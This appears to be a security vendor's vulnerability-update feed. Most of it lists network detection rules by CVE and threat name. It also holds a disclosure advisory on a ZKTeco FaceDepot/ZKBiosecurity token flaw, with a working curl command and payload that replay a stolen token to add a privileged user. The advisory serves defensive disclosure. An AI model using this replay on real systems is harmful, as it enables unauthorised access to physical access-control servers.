All Vulnerabilities

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

Microsoft Office
1010879 - Microsoft Excel XLS File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-27053)
1010878 - Microsoft Excel XLS File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-27054)
1010880 - Microsoft Office Graph Uninitialized Variable Remote Code Execution Vulnerability (CVE-2021-27057)
1010881 - Microsoft PowerPoint PPTX File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-27056)


Oracle E-Business Suite Web Interface
1010730* - Oracle E-Business Suite 'ozfVendorLov' SQL Injection Information Disclosure Vulnerability (CVE-2020-14876)


Web Server Common
1010796* - Apache Druid Remote Code Execution Vulnerability (CVE-2021-25646)


Web Server HTTPS
1010868 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065)
1010870 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1


Web Server Nagios
1010866* - Nagios XI Cross Site Scripting Vulnerability (CVE-2021-25299)


Web Server Oracle
1010590* - Oracle WebLogic Server Remote Code Execution Vulnerabilities (CVE-2020-14882, CVE-2020-14750 and CVE-2020-14883)


Web Server SharePoint
1010823 - Identified Microsoft SharePoint GetPermissionCollection Request (ATT&CK T1069, T1087, T1213.002, T1589.002, T1589.003)
1010864* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-27076)


Integrity Monitoring Rules:

There are no new or updated Integrity Monitoring Rules in this Security Update.


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

DNS Client
1010766* - Identified Non Existing DNS Resource Record (RR) Types In DNS Traffic


DNS Server
1010863* - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26877)
1010865* - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26897)


Oracle E-Business Suite Web Interface
1010730 - Oracle E-Business Suite 'ozfVendorLov' SQL Injection Information Disclosure Vulnerability (CVE-2020-14876)


SSL Client
1010410* - OpenSSL Large DH Parameter Denial Of Service Vulnerability (CVE-2018-0732)


Suspicious Server Ransomware Activity
1010647* - Identified HTTP Backdoor.Win32.Cobalt.SMHP C&C Traffic Request


Web Application PHP Based
1010852* - phpMyAdmin 'SearchController' SQL Injection Vulnerability (CVE-2020-26935)


Web Server Common
1010862* - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282)
1010858* - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282) - 1


Web Server HTTPS
1010849 - Identified Zoom WebSocket Upgrade Request
1010854* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)


Web Server Miscellaneous
1010682* - SolarWinds Orion Platform 'SaveUserSetting' Privilege Escalation Vulnerability (CVE-2021-27258)


Web Server Nagios
1010866 - Nagios XI Cross Site Scripting Vulnerability (CVE-2021-25299)


Web Server SharePoint
1010864* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-27076)


Windows SMB Server
1007065* - Executable File Uploaded On Network Share (ATT&CK T1105)


Integrity Monitoring Rules:

There are no new or updated Integrity Monitoring Rules in this Security Update.


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

Oracle E-Business Suite Web Interface
1010730* - Oracle E-Business Suite 'ozfVendorLov' SQL Injection Information Disclosure Vulnerability (CVE-2020-14876)


Web Client Common
1010877 - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB21-09) - 4


Web Client HTTPS
1010132* - Microsoft Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601) - 1


Web Server Common
1010867 - Apache ActiveMQ Web Console Reflected Cross-Site Scripting Vulnerability (CVE-2020-13947)


Web Server HTTPS
1010868* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065)
1010870* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1
1010850* - VMware vCenter Server Remote Code Execution Vulnerability (CVE-2021-21972 and CVE-2021-21973)
1010875 - rConfig 'vendor.crud.php' Arbitrary File Upload Vulnerability (CVE-2020-12255)


Windows SMB Server
1010884 - Microsoft Windows RPC Remote Code Execution Vulnerability (CVE-2017-8461)


Integrity Monitoring Rules:

1010855* - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

Lack of mutual authentication in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to obtain a long-lasting token by impersonating the server.

The vulnerability has been submitted to ZDI on Dec 3, 2019.

ZDI got one response from the vendor which acknowledged but not confirmed the vulnerability. The responsible disclosure expired on April 30, 2020.

The vendor addressed the vulnerability and has recommended to install an updated version of the software. The update can be found via the vendor's link:

• ZKBioSecurityV5000 3.1.1 R

Details

The researchers have tried two ways to successfully steal the access token in the HTTP header.

1. Use a Python script (zkteco.py, see below) and a self-signed SSL certificate to simulate ZKBiosecurity Server (ADMS) and do ARP spoofing on HTTPS port 8088.
2. Wireshark the default deployment, which does HTTP instead of HTTPS.

We found no CSRF to prevent such attack. Moreover, the token has a long life (at least 2 weeks), and is still valid even after FaceDepot 7B (the Android tablet) issues a new token. The token can be used in replay attack, command forgery, arbitrary user addition and privilege escalation (CVE-2020-17474).

We wrote a proof-of-concept to simulate ZKBiosecurity ADMS with reasonably dummy response. The SSL certificate is self-signed. We did not install the CA into the tablet. After taking over ZKBiosecurity Server's IP by arpspoofing, the script is able to obtain the token for further use. FaceDepot tablet reconnects to the server every 2 - 3 minutes and thus automatically submits a legit token.

After SN and token are obtained, it is easy to, for example, create a user, by using cURL:

curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \
    -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
    -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@bugoy.user.post

Where the content of bugoy.user.post is:

user uuid=	cardno=	pin=11111	password=	group=1	starttime=0 	endtime=0	name=Bugoy Test1	privilege=14	disable=0	verify=0

Vulnerability Type

• CWE-613: Insufficient Session Expiration
• CWE-295: Improper Certificate Validation

Attack Type

Remote

Impact Information Disclosure

true

Attack Vectors

An attacker who is able to sniff the network or arp-spoof with a fake server obtains a long-lasting token.

Mitigation

• Deploy a firewall in front of ZKBiosecurity Server and enforce allowed IP list and allowed MAC list.
• Deny all unlisted access.

Discoverer

Roel Reyes, Joey Costoya, Philippe Lin, Vincenzo Ciancaglini, Morton Swimmer

Reference

https://www.zkteco.com/en/product_detail/FaceDepot-7B.html

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

Web Server Miscellaneous
1010670* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2020-17530)


Integrity Monitoring Rules:

There are no new or updated Integrity Monitoring Rules in this Security Update.


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

DNS Server
1010863 - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26877)
1010865 - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26897)


Directory Server LDAP
1010820* - OpenLDAP Slapd SASL Proxy Authorization Denial Of Service Vulnerability (CVE-2020-36222)


SolarWinds Orion Platform
1010810* - SolarWinds Orion Platform Insecure Deserialization Vulnerability (CVE-2021-25274)


Web Application Common
1010818* - WordPress 'Code Snippets' Plugin Cross-Site Request Forgery Vulnerability (CVE-2020-8417)


Web Application PHP Based
1010852 - phpMyAdmin 'SearchController' SQL Injection Vulnerability (CVE-2020-26935)


Web Client Common
1010861 - Microsoft Windows Graphics Component Remote Code Execution Vulnerability (CVE-2021-24093)


Web Client Internet Explorer/Edge
1010857 - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2021-26411)


Web Server Common
1010801* - FCKeditor Plugin Arbitrary File Upload Vulnerability (CVE-2009-2265)
1010862 - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282)
1010858 - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282) - 1


Web Server HTTPS
1010854* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)
1010850* - VMware vCenter Server Remote Code Execution Vulnerability (CVE-2021-21972)


Web Server Miscellaneous
1010496* - Apache Struts2 File Upload Denial of Service Vulnerability (CVE-2019-0233)
1010461* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2019-0230)
1010670* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2020-17530)
1010682 - SolarWinds Orion Platform 'SaveUserSetting' Privilege Escalation Vulnerability (CVE-2021-27258)


Web Server Oracle
1010851 - Identified Oracle Application Server 'OWA_UTIL PL/SQL' Package Access


Web Server SharePoint
1010836 - Identified Microsoft SharePoint GetGroupCollection Request (ATT&CK T1589, T1213.002, T1087)
1010835 - Identified Microsoft SharePoint GetGroupCollectionFromRole Request (ATT&CK T1589, T1213.002, T1087, T1069)
1010834 - Identified Microsoft SharePoint GetGroupCollectionFromSite Request (ATT&CK T1589, T1213.002, T1087, T1069)
1010833 - Identified Microsoft SharePoint GetGroupCollectionFromUser Request (ATT&CK T1589, T1213.002, T1087, T1069)
1010832 - Identified Microsoft SharePoint GetGroupCollectionFromWeb Request (ATT&CK T1589, T1213.002, T1087, T1069)
1010831 - Identified Microsoft SharePoint GetGroupInfo Request (ATT&CK T1589, T1213.002, T1087, T1069)
1010830 - Identified Microsoft SharePoint GetRoleCollection Request (ATT&CK T1589, T1213.002, T1087, T1069)
1010864 - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-27076)


Zoho ManageEngine
1010811* - Zoho ManageEngine Applications Manager SQL Injection Vulnerability (CVE-2020-35765)


Integrity Monitoring Rules:

1010855* - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

Web Server HTTPS
1010854 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)


Integrity Monitoring Rules:

1010855 - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

DNS Client
1010744* - DNS Request To Ngrok Domain Detected


Directory Server LDAP
1010820 - OpenLDAP Slapd SASL Proxy Authorization Denial Of Service Vulnerability (CVE-2020-36222)
1010799* - OpenLDAP Slapd Search Parsing Integer Underflow Vulnerability (CVE-2020-36228)


FTP Server IIS
1010797* - SolarWinds Serv-U FTP Server Stored Cross-Site Scripting Vulnerability Over FTP (CVE-2020-28001)


SAP NetWeaver Java Application Server
1010816 - Identified SAP Solution Manager Security Software Discovery Over HTTP (ATT&CK T1518.001)
1010822 - Identified SAP Solution Manager Tool Transfer Over HTTP (ATT&CK T1105, T1570)


SSL Client
1010410* - OpenSSL Large DH Parameter Denial Of Service Vulnerability (CVE-2018-0732)


SolarWinds Orion Platform
1010810 - SolarWinds Orion Platform Insecure Deserialization Vulnerability (CVE-2021-25274)


Trend Micro OfficeScan
1010780 - Trend Micro Apex One Multiple Information Disclosure Vulnerabilities
1010709* - Trend Micro Apex One Multiple Information Disclosure Vulnerabilities (CVE-2020-28573 and CVE-2020-28576)


Web Application Common
1010818 - WordPress 'Code Snippets' Plugin Cross-Site Request Forgery Vulnerability (CVE-2020-8417)


Web Client Common
1010760* - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB21-09) - 1
1001933* - Identified Suspicious Usage Of Shellcode For Client


Web Server Common
1010796* - Apache Druid Remote Code Execution Vulnerability (CVE-2021-25646)
1010802* - FCKeditor Plugin Arbitrary File Upload Vulnerability (CVE-2008-6178)
1010801 - FCKeditor Plugin Arbitrary File Upload Vulnerability (CVE-2009-2265)
1008581* - Identified Suspicious IP Addresses In XFF HTTP Header
1010761* - PRTG Network Monitor Command Injection Vulnerability (CVE-2018-9276)
1010804* - SolarWinds Serv-U FTP Server Stored Cross-Site Scripting Vulnerability Over HTTP (CVE-2020-28001)


Web Server HTTPS
1010850 - VMware vCenter Server Remote Code Execution Vulnerability (CVE-2021-21972)
1010712* - WordPress 'Contact Form 7' Plugin Arbitrary File Upload Vulnerability (CVE-2020-35489)


Zoho ManageEngine
1010811 - Zoho ManageEngine Applications Manager SQL Injection Vulnerability (CVE-2020-35765)


Integrity Monitoring Rules:

There are no new or updated Integrity Monitoring Rules in this Security Update.


Log Inspection Rules:

1003613* - DHCP Server - Microsoft Windows
1003447* - Web Server - Apache

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

DCERPC Services
1007596* - Identified Possible Ransomware File Extension Rename Activity Over Network Share


DNS Client
1010771* - DNSmasq DNSSEC Out Of Bounds Write Vulnerability (CVE-2020-25683)


Database Microsoft SQL
1010643* - Microsoft SQL Database Server Possible Login Brute Force Attempt


Directory Server LDAP
1010799 - OpenLDAP Slapd Search Parsing Integer Underflow Vulnerability (CVE-2020-36228)


FTP Server IIS
1010797 - SolarWinds Serv-U FTP Server Stored Cross-Site Scripting Vulnerability Over FTP (CVE-2020-28001)


Hot Rod Client
1009119* - Red Hat JBoss Data Grid Hot Rod Client Insecure Deserialization (CVE-2017-15089)


Memcached
1008916* - Identified Memcached Reflected UDP Traffic


Web Application Common
1010488* - Identified WordPress Database Reset Attempt
1010562* - Mantis Bug Tracker 'verify.php' Remote Password Reset Vulnerability (CVE-2017-7615)
1009310* - Microsoft Exchange Server SSRF Vulnerability (CVE-2018-16793)


Web Application PHP Based
1008858* - Identified Access To 'wp-admin' Directory


Web Server Common
1010796 - Apache Druid Remote Code Execution Vulnerability (CVE-2021-25646)
1010802 - FCKeditor Plugin Arbitrary File Upload Vulnerability (CVE-2008-6178)
1007651* - Identified Absence Of Configured CDN/Reverse Proxy HTTP Header
1010761 - PRTG Network Monitor Command Injection Vulnerability (CVE-2018-9276)
1010804 - SolarWinds Serv-U FTP Server Stored Cross-Site Scripting Vulnerability Over HTTP (CVE-2020-28001)


Web Server HTTPS
1010795* - Joomla CMS Cross-Site Scripting Vulnerability (CVE-2021-23124)
1010772* - Microsoft Exchange Remote Code Execution Vulnerability (CVE-2020-17132)


Web Server Miscellaneous
1008747* - Adobe ColdFusion RMI Registry Insecure Deserialization (CVE-2017-11284)
1008840* - Apache CouchDB '_config' Command Execution Vulnerability


Web Server Oracle
1010752* - Oracle Coherence Server T3 Protocol Insecure Deserialization Vulnerability (CVE-2020-14756)


Web Server SharePoint
1010794* - Microsoft SharePoint Workflow Deserialization Of Untrusted Data Remote Code Execution Vulnerability (CVE-2021-24066)


Zoho ManageEngine
1010774 - Identified WebNMS Framework Server Sensitive File Access (ATT&CK T1552.001)


Integrity Monitoring Rules:

There are no new or updated Integrity Monitoring Rules in this Security Update.


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

DCERPC Services
1009801* - Microsoft Windows NTLM Elevation Of Privilege Vulnerability (CVE-2019-1040)
1008179* - Restrict File Extensions For Rename Activity Over Network Share


DNS Client
1010771 - DNSmasq DNSSEC Out Of Bounds Write Vulnerability (CVE-2020-25683)
1010784 - DNSmasq DNSSEC Out Of Bounds Write Vulnerability (CVE-2020-25687)
1010766* - Identified Non Existing DNS Resource Record (RR) Types In DNS Traffic


Database Microsoft SQL
1008759* - Microsoft SQL Server 'EXECUTE AS' Privilege Escalation Vulnerability


Directory Server LDAP
1010754* - Microsoft Windows NTLM Elevation Of Privilege Vulnerability Over LDAP (CVE-2019-1040)


Microsoft Office
1010785 - Microsoft Excel XLS File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-24070)
1010786 - Microsoft Excel XLSX File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-24067)


Suspicious Client Application Activity
1010741* - Identified HTTP Backdoor Python FreakOut A Runtime Detection


Suspicious Client Ransomware Activity
1010792 - Identified Cobalt Strike Default Self-signed SSL/TLS Certificate


Suspicious Server Application Activity
1008918* - Identified Memcached Amplified Reflected Response


Web Application Common
1005933* - Identified Directory Traversal Sequence In Uri Query Parameter


Web Application Ruby Based
1008574* - Ruby On Rails Development Web Console Code Execution Vulnerability (CVE-2015-3224)


Web Client Common
1010760* - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB21-09) - 1
1010790 - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB21-09) - 3
1010787 - Microsoft Windows Camera Codec Pack Image Processing Out-Of-Bounds Write Vulnerability (CVE-2021-24081)
1010788 - Microsoft Windows Camera Codec Pack Out-Of-Bounds Write Remote Code Execution Vulnerability (CVE-2021-24091)
1004226* - Microsoft Windows Help Centre Malformed Escape Sequences Vulnerability
1006582* - Microsoft Windows Help Centre Malformed Escape Sequences Vulnerability (CVE-2010-1885)
1010789 - Microsoft Windows WAB File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability (CVE-2021-24083)


Web Client SSL
1006296* - Detected SSLv3 Response (ATT&CK T1032)
1006298* - Identified CBC Based Cipher Suite In SSLv3 Request (ATT&CK T1032)


Web Server Apache
1010751 - Proxifier Proxy Client


Web Server Common
1010737* - CMS Made Simple 'Showtime2' Reflected Cross Site Scripting Vulnerability (CVE-2020-20138)
1010736* - Cisco Data Center Network Manager Authentication Bypass Vulnerability (CVE-2019-15977)
1010769 - Identified Kubernetes Namespace API Requests
1010477* - Java Unserialize Remote Code Execution Vulnerability - 1


Web Server HTTPS
1010795 - Joomla CMS Cross-Site Scripting Vulnerability (CVE-2021-23124)
1010772 - Microsoft Exchange Remote Code Execution Vulnerability (CVE-2020-17132)


Web Server Miscellaneous
1008610* - Block Object-Graph Navigation Language (OGNL) Expressions Initiation In Apache Struts HTTP Request
1004874* - TimThumb Plugin Remote Code Execution Vulnerability


Web Server SharePoint
1010764* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-24072)
1010794 - Microsoft SharePoint Workflow Deserialization Of Untrusted Data Remote Code Execution Vulnerability (CVE-2021-24066)


Windows Services RPC Server DCERPC
1008479* - Identified Usage Of WMI Execute Methods - Server


Integrity Monitoring Rules:

There are no new or updated Integrity Monitoring Rules in this Security Update.


Log Inspection Rules:

1003631* - DNS Server - Microsoft Windows